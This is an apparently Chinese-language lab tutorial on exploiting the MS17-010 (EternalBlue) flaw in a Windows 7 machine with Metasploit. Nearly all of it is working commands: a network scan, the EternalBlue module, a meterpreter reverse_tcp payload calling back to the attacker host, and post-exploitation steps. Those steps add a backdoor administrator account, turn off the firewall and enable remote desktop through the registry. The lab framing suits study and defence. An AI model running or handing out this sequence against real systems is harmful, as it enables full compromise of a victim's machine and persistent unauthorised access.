注:針對的系統是Windows7 64位作業系統,其他作業系統請自行測試。

一.測試環境:

kali linux:192.168.121.128 (攻擊機)

win7:192.168.121.130 (目標靶機)

二.攻擊前的準備

1.檢視kali的ip地址

命令:ifconfig

2.使用nmap掃描區域網內的所有主機(ms17_010漏洞的最基本要求是需要開啟445埠)

命令:nmap 192.168.121.1/24

可以看到445埠開著,那就可以開始我們的攻擊利用

3.開啟Metasploit框架

命令:msfconsole

4.搜尋ms17_010漏洞(永恆之藍)

命令:search ms17_010

5.使用永恆之藍漏洞

命令:use exploit/windows/smb/ms17_010_eternalblue

6.顯示所需要的引數

命令:show options

三.設定攻擊引數

1.設定目標主機

命令:set rhost 192.168.121.130

2.設定攻擊載體(一個好用的攻擊模組)

命令:set payload windows/x64/meterpreter/reverse_tcp

3.設定攻擊機ip,用來攻擊成功之後，監聽被開放的目標電腦的埠(一開始查的kali的ip)

命令:set lhost 192.168.121.128

4.檢查引數是否配置正確

命令:show options

四.攻擊

命令:run

五.利用

1.獲取截圖

命令:screenshot

2.靶機shell(以管理員身份開啟靶機的cmd)

命令:shell

六.拿到shell後可進行的操作(Dos命令)

1.建立一個叫szsec,密碼為123456的使用者

命令:net user szsec 123456 /add

2.對剛才建立的使用者提權為管理員

命令:net localgroup administrators szsec /add

3.關閉防火牆

命令:netsh firewall set opmode mode=disable

4.檢視開啟的埠

命令：netstat -ano

5.開啟3389埠

命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

七.遠端桌面

1.使用win10的遠端桌面管理

2.遠端桌面成功

最後：網際網路不是法外之地，大家且行且珍惜~